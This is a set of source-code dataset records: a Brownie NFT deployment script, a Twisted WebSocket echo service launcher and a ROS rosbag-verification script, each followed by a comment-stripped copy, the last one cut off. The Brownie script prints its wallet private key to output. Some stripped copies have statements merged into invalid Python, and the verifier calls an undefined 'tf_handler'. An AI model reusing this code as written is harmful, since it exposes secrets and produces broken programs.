c73d1f2612440490c33b04c8cbac0eb9a086c514
|
[
"MIT"
] | 1
|
2021-07-14T17:18:37.000Z
|
2021-07-14T17:18:37.000Z
|
#!/usr/bin/python3
from brownie import AdvancedCollectible, accounts, network, config
from scripts.helpful_scripts import fund_advanced_collectible
def main():
print(config["wallets"]["from_key"])
dev = accounts.add(config["wallets"]["from_key"])
print(network.show_active())
# publish_source = True if os.getenv("ETHERSCAN_TOKEN") else False # Currently having an issue with this
publish_source = False
advanced_collectible = AdvancedCollectible.deploy(
config["networks"][network.show_active()]["vrf_coordinator"],
config["networks"][network.show_active()]["link_token"],
config["networks"][network.show_active()]["keyhash"],
{"from": dev},
publish_source=publish_source,
)
fund_advanced_collectible(advanced_collectible)
return advanced_collectible
| 39.52381
| 108
| 0.720482
|
from brownie import AdvancedCollectible, accounts, network, config
from scripts.helpful_scripts import fund_advanced_collectible
def main():
print(config["wallets"]["from_key"])
dev = accounts.add(config["wallets"]["from_key"])
print(network.show_active())
publish_source = False
advanced_collectible = AdvancedCollectible.deploy(
config["networks"][network.show_active()]["vrf_coordinator"],
config["networks"][network.show_active()]["link_token"],
config["networks"][network.show_active()]["keyhash"],
{"from": dev},
publish_source=publish_source,
)
fund_advanced_collectible(advanced_collectible)
return advanced_collectible
| true
| true
|
f707b8955010ddb9ca4a46873c7c4a917555830a
| 2,329
|
py
|
Python
|
examples/twisted/websocket/echo_service/echows/main.py
|
dimddev/AutobahnPython
|
75442d2d1d2d2a3248ca264e3d196db5fbad0f70
|
[
"MIT"
] | null | null | null |
examples/twisted/websocket/echo_service/echows/main.py
|
dimddev/AutobahnPython
|
75442d2d1d2d2a3248ca264e3d196db5fbad0f70
|
[
"MIT"
] | null | null | null |
examples/twisted/websocket/echo_service/echows/main.py
|
dimddev/AutobahnPython
|
75442d2d1d2d2a3248ca264e3d196db5fbad0f70
|
[
"MIT"
] | null | null | null |
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import twisted
from twisted.python import log, usage
from twisted.application.service import MultiService
from echoservice import EchoService
class AppService(MultiService):
"""
Our application service hierarchy.
"""
def startService(self):
# create WebSocket echo service and make it a child of our app service
svc = EchoService(self.port, self.debug)
svc.setName("EchoService")
svc.setServiceParent(self)
MultiService.startService(self)
class Options(usage.Options):
optFlags = [['debug', 'd', 'Emit debug messages']]
optParameters = [["port", "p", 8080, "Listening port (for both Web and WebSocket) - default 8080."]]
def makeService(options):
"""
This will be called from twistd plugin system and we are supposed to
create and return our application service.
"""
# create application service and forward command line options ..
service = AppService()
service.port = int(options['port'])
service.debug = options['debug']
return service
| 34.761194
| 104
| 0.681838
|
import twisted
from twisted.python import log, usage
from twisted.application.service import MultiService
from echoservice import EchoService
class AppService(MultiService):
def startService(self):
svc = EchoService(self.port, self.debug)
svc.setName("EchoService")
svc.setServiceParent(self)
MultiService.startService(self)
class Options(usage.Options):
optFlags = [['debug', 'd', 'Emit debug messages']]
optParameters = [["port", "p", 8080, "Listening port (for both Web and WebSocket) - default 8080."]]
def makeService(options):
service = AppService()
service.port = int(options['port'])
service.debug = options['debug']
return service
| true
| true
|
f707b8d2ea591e22da57beaa84d6d6571d614fea
| 27,318
|
py
|
Python
|
scripts/testing/verify_data.py
|
ROSMilitary/DDR_Data_Recorder
|
d491a8433f2e3ae1ed88eea5c6f13207ab55247f
|
[
"MIT"
] | 5
|
2020-10-21T18:06:33.000Z
|
2022-02-04T21:01:24.000Z
|
scripts/testing/verify_data.py
|
ROSMilitary/DDR_Data_Recorder
|
d491a8433f2e3ae1ed88eea5c6f13207ab55247f
|
[
"MIT"
] | null | null | null |
scripts/testing/verify_data.py
|
ROSMilitary/DDR_Data_Recorder
|
d491a8433f2e3ae1ed88eea5c6f13207ab55247f
|
[
"MIT"
] | 4
|
2021-03-27T00:33:11.000Z
|
2022-02-04T21:01:14.000Z
|
#!/usr/bin/env python3
#******************************************************************************
#
#"Distribution A: Approved for public release; distribution unlimited. OPSEC #4046"
#
#PROJECT: DDR
#
# PACKAGE :
# ORIGINAL AUTHOR :
# MODIFIED DATE :
# MODIFIED BY :
# REVISION :
#
# Copyright (c) 2020 DCS Corporation
#
# Unlimited Rights assigned to the U.S. Government
#
# This material may be reproduced by or for the U.S Government pursuant
# to the copyright license under the clause at DFARS 252.227-7013. This
# notice must appear in all copies of this file and its derivatives.
#******************************************************************************
#
#Copyright (c) 2019-2020 U.S. Federal Government (in countries where recognized)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
#DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
#ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import collections
import glob
import logging
import logging.handlers
import mmap
import os
import pprint
import re
import sys
import threading
import rosbag
import rospkg
from topic_bag_checker import TopicBagChecker
from topic_connection import TopicConnection
from verification_report import VerificationReport
# Instance of rospkg.RosPack to find ros packages
ROS_PACK = rospkg.RosPack()
PKG_DIR = ROS_PACK.get_path('ddr_data_recorder')
SCRIPTS_PATH = os.path.join(PKG_DIR, 'scripts')
sys.path.insert(1, SCRIPTS_PATH)
import util # pylint: disable=wrong-import-position
## @vars Stores program options
FLAGS = None
## @vars The list of topics not to verify
ILLEGAL_TOPICS = [
'/your/topic'
]
## @vars The list of topics which require a
# special message key comparison function
SPECIAL_TOPICS = [
'/your/topic'
]
# The main logger for the file
_LOGGER = None
# The lock for creating the logger
_LOGGER_LOCK = threading.Lock()
# Named tuple representing a key of a particular message
MessageKey = collections.namedtuple(
'MessageKey', ['seq', 'secs', 'nsecs'])
# Named tuple representing a key of /tf messages
TransformKey = collections.namedtuple(
'TransformKey', ['seq', 'secs', 'nsecs', 'child_frame_id'])
CURRENT_REPORT = None
## Add positional arguments to parser.
# Positional arguments are required and do not use a unique identifier to
# identify them, instead they are differentiated based on their position
# within the command.
# @param parser The ArgumentParser object to add the positional arguments to
# @returns None
def add_positional_arguments(parser):
parser.add_argument(
'directories',
metavar='directory',
nargs='+',
help='Directories of bag files to postprocess'
)
## Add optional arguments to parser.
# Optional arguments are not required and use a unique identifier to
# identify them.
# @param parser The ArgumentParser object to add the optional arguments to
# @returns None
def add_optional_arguments(parser):
parser.add_argument(
'-d', '--debug',
help=argparse.SUPPRESS,
action="store_const",
dest="log_level",
const=logging.DEBUG
)
parser.add_argument(
'-v', '--verbose',
help='Enables verbose mode',
action="store_const",
dest="log_level",
const=logging.INFO,
)
parser.add_argument(
'-t', '--tolerance',
type=int,
default=10,
metavar='T',
help='The tolerance to decide if a gap is missing data, ' \
'or a different publisher'
)
parser.add_argument(
'--log-name',
default='verify_data.log',
metavar='NAME',
help='The name of the log files'
)
parser.add_argument(
'--log-dir',
default=util.clean_directory_name('~/ddr_bags/verify_data_logs/'), # pylint: disable=no-member
metavar='DIR',
help='The directory to store the verify data log files in'
)
parser.add_argument(
'--num-logs',
type=int,
default=10,
metavar='NUM',
help='The number of log files to keep'
)
parser.add_argument(
'--log-size',
type=int,
default=1000000,
metavar='B',
help='The size of each log file in bytes ' \
'before generating a new log file'
)
parser.add_argument(
'--kml-path',
metavar='PATH',
help='The path to the kml file to use for verification'
)
parser.set_defaults(log_level=logging.WARNING)
## Parse all positional arguments and options.
# Parse the positional arguments and options specified into the global FLAGS
# variable and store unknown arguments into a new argv to pass to main.
# @param argv An argument vector to parse
# @returns A new argv for use in main
def parse_args(argv):
global FLAGS #pylint: disable=global-statement
# Argument parser from argparse
parser = argparse.ArgumentParser()
# Add all of the positional arguments
add_positional_arguments(parser)
# Add all of the optional arguments
add_optional_arguments(parser)
# Parse the arguments into FLAGS and argv
FLAGS, _argv = parser.parse_known_args(argv)
return _argv
## Get the main logger.
# Get the main logger or create a main logger if one does not exist
# @returns The main logger
def get_logger():
global _LOGGER #pylint: disable=global-statement
# Check if the logger has already been created
if not _LOGGER:
# Get a logger and name it
logger = logging.getLogger('main')
# Set the logging level for the current program
logger.setLevel(logging.DEBUG)
# Clean user input and make sure the directory exists
log_dir = util.clean_directory_name(FLAGS.log_dir) # pylint: disable=no-member
util.ensure_directory_exists(log_dir) # pylint: disable=no-member
# Clean user input and get just the name
if FLAGS.log_name.endswith('/'):
log_name = os.path.dirname(FLAGS.log_name)
else:
log_name = os.path.basename(FLAGS.log_name)
# Add the output handler.
_file_handler = logging.handlers.RotatingFileHandler(
os.path.join(log_dir, log_name),
maxBytes=FLAGS.log_size,
backupCount=FLAGS.num_logs
)
_file_handler.setFormatter(logging.Formatter(
fmt='%(asctime)s.%(msecs)03d %(message)s',
datefmt='%Y_%m_%d %H:%M:%S'
))
_file_handler.setLevel(logging.DEBUG)
logger.addHandler(_file_handler)
# Add the output handler.
_handler = logging.StreamHandler(sys.stdout)
_handler.setFormatter(logging.Formatter(fmt='%(message)s'))
_handler.setLevel(FLAGS.log_level)
logger.addHandler(_handler)
# Get a lock on the logger
with _LOGGER_LOCK:
# Set the global logger
_LOGGER = logger
return _LOGGER
## Determine if a message is valid
# Determine if a message is valid to be used for indexing
# in an old bag
# @param message The message to verify
# @returns Bool if message is valid for use in indexing in an old bag
def is_valid(value):
if value.topic not in ILLEGAL_TOPICS:
# Message must have a header field
# This is how to check for a header according
# to the ROS Cookbook and it's twice as fast
# as hasattr(value.message, 'header') so ¯\_(ツ)_/¯
if value.message._has_header: # pylint: disable=protected-access
return True
return False
## Get the key from a bag message
# Gets the unique key for a message from a bag
# @param bag_message The bag message to get the unique key for
# @returns collections.namedtuple MessageKey or TransformKey that represents
# the unique key value of the bag message
def get_message_key(bag_message):
logger = get_logger()
key = None
# Skip illegal topics
if bag_message.topic not in ILLEGAL_TOPICS:
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
key = bag_message.message.data
# Handle /special topic
# use this template to create a handler for topics that have weird data vars
elif bag_message.topic == '/special':
transform = bag_message.message.transforms[0]
key = TransformKey(transform.header.seq,
transform.header.stamp.secs,
transform.header.stamp.nsecs,
transform.child_frame_id)
# ***********************************
elif is_valid(bag_message):
# Message key is a tuple of the sequence number and timestamp
# from the header of the message
key = MessageKey(bag_message.message.header.seq,
bag_message.message.header.stamp.secs,
bag_message.message.header.stamp.nsecs)
else:
logger.info('No handler for topic %s', bag_message.topic)
logger.debug('message: %s\n', bag_message.message)
return key
## Handle comparison of the special case /andBeyond topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int The value of the comparison between current_key and key
def and_beyond_handler(current_key, key):
diff = current_key - key
if diff > 0:
return diff
return None
## Handle comparison of the special case /special topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns Bool The value of the comparison between current_key and key
def special_handler(current_key, key):
key_is_good = False
if current_key.secs - key.secs > 0:
key_is_good = True
elif current_key.secs - key.secs == 0:
if current_key.nsecs - key.nsecs > 0:
key_is_good = True
return key_is_good
## Compares keys of messages, calling the special case handlers if needed
# @param bag_message The message from the bag
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int, Bool, or None The value of the comparison between
# current_key and key
def compare_keys(bag_message, current_key, key):
logger = get_logger()
# Skip illegal topics
if bag_message.topic in ILLEGAL_TOPICS:
logger.debug('Illegal topic: %s', bag_message.topic)
return None
ret_val = None
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
ret_val = and_beyond_handler(current_key, key)
# Handle /special topic
elif bag_message.topic == '/special':
ret_val = special_handler(current_key, key)
elif is_valid(bag_message):
ret_val = current_key.seq - key.seq
return ret_val
## Handle the verification of any special case topics that require
# different key verification logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify_special(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic == '/special':
key = topic_connection.get_key(current_key.child_frame_id)
if key is not None:
if not tf_handler(current_key, key):
print('Topic {} may not line up.'.format(bag_message.topic))
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
key)
logger.debug('verify_special topic_connection: %s, current_key: %s',
topic_connection, current_key)
topic_connection.set_key(current_key.child_frame_id, current_key)
## Handle the verification of all topics not requiring special case logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic in SPECIAL_TOPICS:
verify_special(bag_message, topic_connection, current_key)
return
if len(topic_connection.keys) == 0:
topic_connection.add_key(current_key)
return
lowest_diff = None
index = -1
for i, key in enumerate(topic_connection.keys):
diff = compare_keys(bag_message, current_key, key)
if diff is not None:
if lowest_diff is None or diff < lowest_diff:
lowest_diff = diff
index = i
if lowest_diff is None:
logger.debug('lowest_diff is None.\n' \
'current_key: %s;\n' \
'topic_connection: %s',
current_key,
topic_connection)
return
if lowest_diff == 1:
topic_connection.set_key(index, current_key)
logger.debug('lowest_diff == 1.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= 0 and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff <= 0 and len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff > FLAGS.tolerance and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff > FLAGS.tolerance and ' \
'len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= FLAGS.tolerance:
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
print('Topic {} does not line up by {} messages'.format(
bag_message.topic, lowest_diff))
CURRENT_REPORT.add_bad_topic(bag_message.topic, lowest_diff)
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
topic_connection.get_key(index))
topic_connection.set_key(index, current_key)
## Verify the contents of a single file
# @param file The path to the file to verify
# @param topic_connections All topic connections
def verify_file(file, topic_connections):
with rosbag.Bag(file, 'r') as bag:
bag_info = bag.get_type_and_topic_info()
topic_connections[file] = set(bag_info.topics.keys())
for topic, value in bag_info.topics.items():
if topic in ILLEGAL_TOPICS:
continue
topic_connection = topic_connections.get(topic)
if topic_connection:
topic_connection.connections = value.connections
else:
if topic in SPECIAL_TOPICS:
topic_connections[topic] = TopicConnection(
topic, value.connections, special_topic=True)
else:
topic_connections[topic] = TopicConnection(
topic, value.connections)
messages = bag.read_messages()
for bag_message in messages:
if bag_message.topic in ILLEGAL_TOPICS:
continue
current_key = get_message_key(bag_message)
verify(
bag_message,
topic_connections[bag_message.topic],
current_key
)
## Reset the keys for specific topics
# @param topic_connections All topic connections
# @param topics_to_clear The list of topics to clear the keys of
def reset_topics(topic_connections, topics_to_clear):
for topic in topics_to_clear:
topic_connection = topic_connections.get(topic)
if topic_connection is not None:
topic_connection.reset()
## Verify all the files in a directory
# @param files_list The list of file paths to verify
# @param tbc The TopicBagChecker to use for verification of bags
# and clearing of keys
def verify_files_in_directory(files_list, tbc):
logger = get_logger()
mode_pattern = r'^[a-zA-Z0-9_ -/()]*\d+_(?P<mode>.*)_\d+\.bag$'
topic_connections = {}
previous_mode = None
for file in files_list:
logger.info('Processing file %s', file)
if previous_mode is not None:
match = re.match(mode_pattern, file)
if match is not None:
current_mode = match.group('mode')
if current_mode != previous_mode:
topics_to_clear = tbc.process_bag(previous_mode,
current_mode)
reset_topics(topic_connections, topics_to_clear)
previous_mode = current_mode
else:
match = re.match(mode_pattern, file)
if match:
previous_mode = match.group('mode')
logger.debug('previous_mode: %s', previous_mode)
verify_file(file, topic_connections)
## Gets the path to the kml file
# Gets the path to the kml file using the kml-file command line argument first.
# If no command line parameter is found or it is invalid, it looks for a kml
# file in the directory that is currently being processed. If there is still no
# kml file found, the final place checked is in the ddr_data_director package
# @param directory The current directory being verified
# @returns String The path to the kml file
def get_kml_paths(directory):
logger = get_logger()
kml_glob_pattern = '{}/*.xml'
# Check if the user specified a kml file
if FLAGS.kml_path:
if not FLAGS.kml_path.endswith('/'):
kml_path = os.path.expanduser(FLAGS.kml_path)
if os.path.isfile(kml_path):
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.chosen_kml_name = os.path.basename(kml_path)
CURRENT_REPORT.kml_reason = \
'User specified a KML file for verification'
return [kml_path]
logger.info(
'"%s" is not a valid kml path. Attempting to find a kml in "%s"',
kml_path,
directory
)
# User did not specify a kml, attempt to find one in the current directory
kml_paths = glob.glob(kml_glob_pattern.format(directory))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was found in capture folder'
return kml_paths
# No kml in current directory, attempt to find one
# in the ddr_data_recorder ros package
ddr_dir = os.path.join(
SCRIPTS_PATH,
'dynamic_recording'
)
logger.info(
'No kml file in "%s". Attempting to find a kml in "%s"',
directory,
ddr_dir
)
kml_paths = glob.glob(kml_glob_pattern.format(ddr_dir))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was not found in capture ' \
'folder, but was found in the installation directory'
return kml_paths
logger.info('No kml files found.')
return []
## Gets the path to the markdown file
# Gets the path to the markdown file in the curent directory. If multiple files
# exist, one is picked at random (due to how glob works).
# @param directory The current directory being verified
# @returns String The path to the markdown file
def get_markdown_paths(directory):
markdown_paths = glob.glob(os.path.join(directory, '*.md'))
if len(markdown_paths) == 1:
return markdown_paths[0]
if markdown_paths:
return markdown_paths
logger = get_logger()
logger.info('No markdown files found in "%s"', directory)
return []
## Gets the kml hash from the markdown file
# Looks through the markdown file and finds the line that contains the hash of
# the kml file used when it was created
# @param markdown_path The path to the markdown file to get the hash from
# @returns String The hash of the kml from the markdown
def get_markdown_hash(markdown_path):
logger = get_logger()
try:
with open(markdown_path, 'rb', 0) as _file, \
mmap.mmap(_file.fileno(), 0, access=mmap.ACCESS_READ) \
as markdown_file:
search_result = re.search(
br'## Hash of Used XML file \(md5\): (?P<hash>[0-9a-f]{32})',
markdown_file
)
if search_result:
markdown_hash = search_result.group('hash').decode('utf-8')
if CURRENT_REPORT is not None:
CURRENT_REPORT.markdown_hash_exists = True
CURRENT_REPORT.markdown_hash = markdown_hash
logger.info('Hash for kml found in "%s"', markdown_path)
return markdown_hash
except ValueError:
pass
logger.info('No hash for kml found in "%s"', markdown_path)
return ''
## Verifies that the hash of the kml file and the hash from the markdown file
# match
# @param kml_path The path to the kml file to verify
# @param markdown_path The path to the markdown file to verify the kml against
# @returns Bool True if the hashes match, False if they do not
def verify_kml_hash(kml_paths, markdown_paths):
logger = get_logger()
for markdown_path in markdown_paths:
markdown_kml_hash = get_markdown_hash(markdown_path)
if markdown_kml_hash:
logger.debug('markdown_kml_hash = %s', markdown_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_markdown_name = \
os.path.basename(markdown_path)
break
for kml_path in kml_paths:
current_kml_hash = util.generate_hash(kml_path) # pylint: disable=no-member
if not markdown_kml_hash:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return False, kml_path
if current_kml_hash == markdown_kml_hash:
logger.debug('kml_hash = %s', current_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return True, kml_path
return False, ''
def write_report():
if CURRENT_REPORT is not None:
with CURRENT_REPORT:
CURRENT_REPORT.write_header()
CURRENT_REPORT.write_settings(**vars(FLAGS))
CURRENT_REPORT.write_kml_section()
CURRENT_REPORT.write_files_verified()
CURRENT_REPORT.write_unverified_topics(ILLEGAL_TOPICS)
CURRENT_REPORT.write_bad_topics()
def main():
global CURRENT_REPORT # pylint: disable=global-statement
argv = [sys.argv[0]] + parse_args(sys.argv[1:])
logger = get_logger()
logger.debug('FLAGS=%s', FLAGS)
logger.debug('argv=%s', argv)
logger.info('Unable to verify the following topics:\n%s', pprint.pformat(
ILLEGAL_TOPICS))
logger.info('Topics requiring special handling:\n%s', pprint.pformat(
SPECIAL_TOPICS))
directories = map(os.path.expanduser, FLAGS.directories)
for directory in directories:
if os.path.isdir(directory):
logger.info('Processing directory "%s"', directory)
CURRENT_REPORT = VerificationReport(directory)
kml_paths = get_kml_paths(directory)
if not kml_paths:
print('Unable to verify "{}". No kml found.'.format(directory))
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = False
write_report()
continue
markdown_paths = get_markdown_paths(directory)
if not markdown_paths:
print('Unable to verify "{}". No markdown ' \
'to compare kml hash against.'.format(directory))
else:
hash_verified, kml_path = verify_kml_hash(
kml_paths, markdown_paths)
if CURRENT_REPORT is not None:
CURRENT_REPORT.matching_hashes = hash_verified
if not hash_verified:
print('Unable to verify {}. KML and markdown ' \
'hashes do not match.'.format(directory))
tbc = TopicBagChecker(kml_path)
files_list = util.get_sorted_files_list(directory) # pylint: disable=no-member
if CURRENT_REPORT is not None:
CURRENT_REPORT.files_list = files_list
verify_files_in_directory(files_list, tbc)
else:
logger.info('"%s" is not a directory.', directory)
write_report()
if __name__ == '__main__':
main()
| 36.278884
| 104
| 0.646167
|
import argparse
import collections
import glob
import logging
import logging.handlers
import mmap
import os
import pprint
import re
import sys
import threading
import rosbag
import rospkg
from topic_bag_checker import TopicBagChecker
from topic_connection import TopicConnection
from verification_report import VerificationReport
ROS_PACK = rospkg.RosPack()
PKG_DIR = ROS_PACK.get_path('ddr_data_recorder')
SCRIPTS_PATH = os.path.join(PKG_DIR, 'scripts')
sys.path.insert(1, SCRIPTS_PATH)
import util
FLAGS = None
ILLEGAL_TOPICS = [
'/your/topic'
]
SPECIAL_TOPICS = [
'/your/topic'
]
_LOGGER = None
_LOGGER_LOCK = threading.Lock()
MessageKey = collections.namedtuple(
'MessageKey', ['seq', 'secs', 'nsecs'])
TransformKey = collections.namedtuple(
'TransformKey', ['seq', 'secs', 'nsecs', 'child_frame_id'])
CURRENT_REPORT = None
def add_positional_arguments(parser):
parser.add_argument(
'directories',
metavar='directory',
nargs='+',
help='Directories of bag files to postprocess'
)
def add_optional_arguments(parser):
parser.add_argument(
'-d', '--debug',
help=argparse.SUPPRESS,
action="store_const",
dest="log_level",
const=logging.DEBUG
)
parser.add_argument(
'-v', '--verbose',
help='Enables verbose mode',
action="store_const",
dest="log_level",
const=logging.INFO,
)
parser.add_argument(
'-t', '--tolerance',
type=int,
default=10,
metavar='T',
help='The tolerance to decide if a gap is missing data, ' \
'or a different publisher'
)
parser.add_argument(
'--log-name',
default='verify_data.log',
metavar='NAME',
help='The name of the log files'
)
parser.add_argument(
'--log-dir',
default=util.clean_directory_name('~/ddr_bags/verify_data_logs/'), metavar='DIR',
help='The directory to store the verify data log files in'
)
parser.add_argument(
'--num-logs',
type=int,
default=10,
metavar='NUM',
help='The number of log files to keep'
)
parser.add_argument(
'--log-size',
type=int,
default=1000000,
metavar='B',
help='The size of each log file in bytes ' \
'before generating a new log file'
)
parser.add_argument(
'--kml-path',
metavar='PATH',
help='The path to the kml file to use for verification'
)
parser.set_defaults(log_level=logging.WARNING)
def parse_args(argv):
global FLAGS
parser = argparse.ArgumentParser()
add_positional_arguments(parser)
add_optional_arguments(parser)
FLAGS, _argv = parser.parse_known_args(argv)
return _argv
def get_logger():
global _LOGGER
if not _LOGGER:
logger = logging.getLogger('main')
logger.setLevel(logging.DEBUG)
log_dir = util.clean_directory_name(FLAGS.log_dir) util.ensure_directory_exists(log_dir)
if FLAGS.log_name.endswith('/'):
log_name = os.path.dirname(FLAGS.log_name)
else:
log_name = os.path.basename(FLAGS.log_name)
_file_handler = logging.handlers.RotatingFileHandler(
os.path.join(log_dir, log_name),
maxBytes=FLAGS.log_size,
backupCount=FLAGS.num_logs
)
_file_handler.setFormatter(logging.Formatter(
fmt='%(asctime)s.%(msecs)03d %(message)s',
datefmt='%Y_%m_%d %H:%M:%S'
))
_file_handler.setLevel(logging.DEBUG)
logger.addHandler(_file_handler)
_handler = logging.StreamHandler(sys.stdout)
_handler.setFormatter(logging.Formatter(fmt='%(message)s'))
_handler.setLevel(FLAGS.log_level)
logger.addHandler(_handler)
with _LOGGER_LOCK:
_LOGGER = logger
return _LOGGER
def is_valid(value):
if value.topic not in ILLEGAL_TOPICS:
# as hasattr(value.message, 'header') so ¯\_(ツ)_/¯
if value.message._has_header: # pylint: disable=protected-access
return True
return False
## Get the key from a bag message
# Gets the unique key for a message from a bag
# @param bag_message The bag message to get the unique key for
# @returns collections.namedtuple MessageKey or TransformKey that represents
# the unique key value of the bag message
def get_message_key(bag_message):
logger = get_logger()
key = None
# Skip illegal topics
if bag_message.topic not in ILLEGAL_TOPICS:
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
key = bag_message.message.data
# Handle /special topic
# use this template to create a handler for topics that have weird data vars
elif bag_message.topic == '/special':
transform = bag_message.message.transforms[0]
key = TransformKey(transform.header.seq,
transform.header.stamp.secs,
transform.header.stamp.nsecs,
transform.child_frame_id)
# ***********************************
elif is_valid(bag_message):
# Message key is a tuple of the sequence number and timestamp
# from the header of the message
key = MessageKey(bag_message.message.header.seq,
bag_message.message.header.stamp.secs,
bag_message.message.header.stamp.nsecs)
else:
logger.info('No handler for topic %s', bag_message.topic)
logger.debug('message: %s\n', bag_message.message)
return key
## Handle comparison of the special case /andBeyond topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int The value of the comparison between current_key and key
def and_beyond_handler(current_key, key):
diff = current_key - key
if diff > 0:
return diff
return None
## Handle comparison of the special case /special topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns Bool The value of the comparison between current_key and key
def special_handler(current_key, key):
key_is_good = False
if current_key.secs - key.secs > 0:
key_is_good = True
elif current_key.secs - key.secs == 0:
if current_key.nsecs - key.nsecs > 0:
key_is_good = True
return key_is_good
## Compares keys of messages, calling the special case handlers if needed
# @param bag_message The message from the bag
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int, Bool, or None The value of the comparison between
# current_key and key
def compare_keys(bag_message, current_key, key):
logger = get_logger()
# Skip illegal topics
if bag_message.topic in ILLEGAL_TOPICS:
logger.debug('Illegal topic: %s', bag_message.topic)
return None
ret_val = None
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
ret_val = and_beyond_handler(current_key, key)
# Handle /special topic
elif bag_message.topic == '/special':
ret_val = special_handler(current_key, key)
elif is_valid(bag_message):
ret_val = current_key.seq - key.seq
return ret_val
## Handle the verification of any special case topics that require
# different key verification logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify_special(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic == '/special':
key = topic_connection.get_key(current_key.child_frame_id)
if key is not None:
if not tf_handler(current_key, key):
print('Topic {} may not line up.'.format(bag_message.topic))
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
key)
logger.debug('verify_special topic_connection: %s, current_key: %s',
topic_connection, current_key)
topic_connection.set_key(current_key.child_frame_id, current_key)
## Handle the verification of all topics not requiring special case logic
# @param bag_message The message from the bag
